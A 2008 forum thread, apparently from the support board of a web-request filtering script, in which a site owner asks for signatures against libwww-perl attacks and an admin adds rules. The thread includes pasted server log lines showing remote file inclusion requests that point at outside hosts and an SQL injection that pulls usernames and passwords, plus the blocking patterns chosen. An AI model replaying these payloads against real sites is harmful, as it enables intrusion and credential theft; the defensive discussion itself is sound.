| Author |
Message |
diabolic.bg
Joined: 30 Nov 2008
Posts: 30
Location: Bulgaria |
|
 An idea |
 |
Can you add in signatures any row who can block libwww-perl script?
Only in last night and today I have already 12 hacking attempts and all are with libwww-perl/5.8xx versions. 
My .htaccess file will grow as Bibble.
_________________
Fallout Vault BG | Vault Tec RSS News |
|
| Tue Dec 16, 2008 6:58 am |
   |
 |
zaphod
Site Admin
Joined: 28 Jan 2008
Posts: 75
|
|
| |
|
Ooh, show me some of the attacks here so I can make proper signatures to catch them. Or were those in the PMs you allready sent, that I just noticed?
Zap 
|
|
| Tue Dec 16, 2008 11:09 am |
|
|
zaphod
Site Admin
Joined: 28 Jan 2008
Posts: 75
|
|
| Next time: |
|
Next time, post a request for a new signature detection in the Signature Data area. This area is for main features.
(I know this seems anal, but if this script takes off, it will be needed to keep order.)
Don't worry about it this time though, because I am minutes from releasing a new signature update to help this.
Zap 
|
|
| Tue Dec 16, 2008 11:18 am |
|
|
diabolic.bg
Joined: 30 Nov 2008
Posts: 30
Location: Bulgaria |
|
| |
|
 |
|
Next time, post a request for a new signature detection in the Signature Data area. This area is for main features.
|
Sorry, I don't knew. Can you move my posts? If no, delete it.
94.75.214.3 - - [16/Dec/2008:02:24:47 +0200] "GET /robots.txt/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 1120 "-" "libwww-perl/5.820"
148.223.217.80 - - [16/Dec/2008:05:34:53 +0200] "GET /phpbb2/topic812.html/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users-- HTTP/1.1" 302 491 "-" "libwww-perl/5.805"
69.36.4.145 - - [16/Dec/2008:13:56:58 +0200] "GET //errors.php?error=http://custercountychief.com/includes/js/tabs/info.txt??? HTTP/1.1" 404 1120 "-" "libwww-perl/5.810"
69.36.4.145 - - [16/Dec/2008:13:56:58 +0200] "GET /phpbb2/archive//errors.php?error=http://custercountychief.com/includes/js/tabs/info.txt??? HTTP/1.1" 404 1120 "-" "libwww-perl/5.810"
94.75.214.3 - - [16/Dec/2008:14:09:26 +0200] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 403 1108 "-" "libwww-perl/5.820"
94.75.214.3 - - [16/Dec/2008:14:16:43 +0200] "GET /phpbb2/archive/urllist.txt//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 1120 "-" "libwww-perl/5.820"
If you want I will place it everyday but I will encumber your forum. 
_________________
Fallout Vault BG | Vault Tec RSS News |
|
| Tue Dec 16, 2008 11:23 am |
|
|
zaphod
Site Admin
Joined: 28 Jan 2008
Posts: 75
|
|
| |
|
All now caught!
"=http://" and "UNION+ALL+SELECT" are now banned in query.
Zap 
|
|
| Sun Dec 21, 2008 8:03 pm |
|
|
diabolic.bg
Joined: 30 Nov 2008
Posts: 30
Location: Bulgaria |
|
|
| Mon Dec 22, 2008 11:05 am |
|
|
|
|
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
|
|
